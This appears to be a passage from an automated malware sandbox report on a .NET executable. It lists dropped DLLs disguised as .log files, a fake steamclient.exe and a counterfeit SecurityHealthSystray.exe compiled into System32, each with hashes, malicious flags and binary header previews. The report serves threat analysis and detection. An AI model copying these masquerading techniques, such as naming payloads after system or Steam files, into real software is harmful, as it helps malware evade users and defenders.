                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sOBLQjau.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sYBlcCMG.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sphCHAEj.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\tEVbjhhz.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\tyOaygFf.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\uENiETnW.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\vhVAXQlb.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\vpESBzMh.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\vvDaHluY.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\yvDYLPoQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\yxHkJcLm.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\yzXsqMXs.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zJmzvlwN.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zdbaQHhe.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\zplKRyKf.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1224
                                                                  Entropy (8bit):4.435108676655666
                                                                  Encrypted:false
                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                  Malicious:false
                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9436482089073297
                                                                  Encrypted:false
                                                                  SSDEEP:48:6ezpHPtVM7Jt8Bs3FJsdcV4MKe27BdgisAvqBHaOulajfqXSfbNtm:HPMPc+Vx9MdrvkEcjRzNt
                                                                  MD5:19DA585CF5892A58AA11468204DB2519
                                                                  SHA1:4EDF2B4352FF17792FC511479D32E93E3395AC13
                                                                  SHA-256:E9B4F849490467E2E68CFC6B0797AD8600CD07CB53C0C77B1639FC9D5822F9F2
                                                                  SHA-512:18BB1D3C35814DA6E444E9B6C7233FF3ED3687AC4B8846D70C4094030235DE7155227EDDB79089B6D1FD6387111B82375DD84110B549A785182C6309DD92D035
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.Jg.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\System32\PING.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):502
                                                                  Entropy (8bit):4.613055660879929
                                                                  Encrypted:false
                                                                  SSDEEP:12:PP5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZdUOAokItULVDv
                                                                  MD5:050849764E801D6C852A1421DB12C055
                                                                  SHA1:8833ECE197CBB5352161CE801CDDD0ED72DFE4D8
                                                                  SHA-256:216A5EC862FFE2DBE915811850CAB68B4703BEEE89A98DDD0F30D600934A210A
                                                                  SHA-512:B72A91362C1491011BA0B6F4CB5F00A23294C7F60D08C6503AB23291B77E7611EEC2169DD78DF5B3CA5BFD2417C51F5AA573819ACB304F7EF708A7B2D678F76B
                                                                  Malicious:false
                                                                  Preview:..Pinging 818225 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                  Static File Info

                                                                  General

                                                                  File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                  Entropy (8bit):7.992098117519039
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:qNdO4D18CF.exe
                                                                  File size:3'012'834 bytes
                                                                  MD5:ce2ec4539435dfeac7e246fe5565c521
                                                                  SHA1:59f3da006005a109914c31b5d5cd94dc4c93309c
                                                                  SHA256:d5ee74f4f460c4f861c01ecc3e22b679075949108b6fee594193695d4175d562
                                                                  SHA512:408a1db2cd98702bca3811e124d78a56cbca79a1d200593759bde1947a4a599f8cd40cd8dbb2e7be7dec416e3f5de0c4466f98ddea1daf6d313671695f25a7ba
                                                                  SSDEEP:49152:6h/814lignPl1s5Cp5+tOCiqgc8I7uBiYUtGGirMn0JkH4SwiLwRktMtL+CsA7Z:6h/8Hgn9u4P+l8I7uB6db0JhAw6tMtLr
                                                                  TLSH:B5D533F098B42D5CDB7B4035559291CD707951B7DA84D7B03FDAB8ACD8B00F2286AB8B
                                                                  File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`.............................

                                                                  File Icon

                                                                  Icon Hash:90cececece8e8eb0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x402e5e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
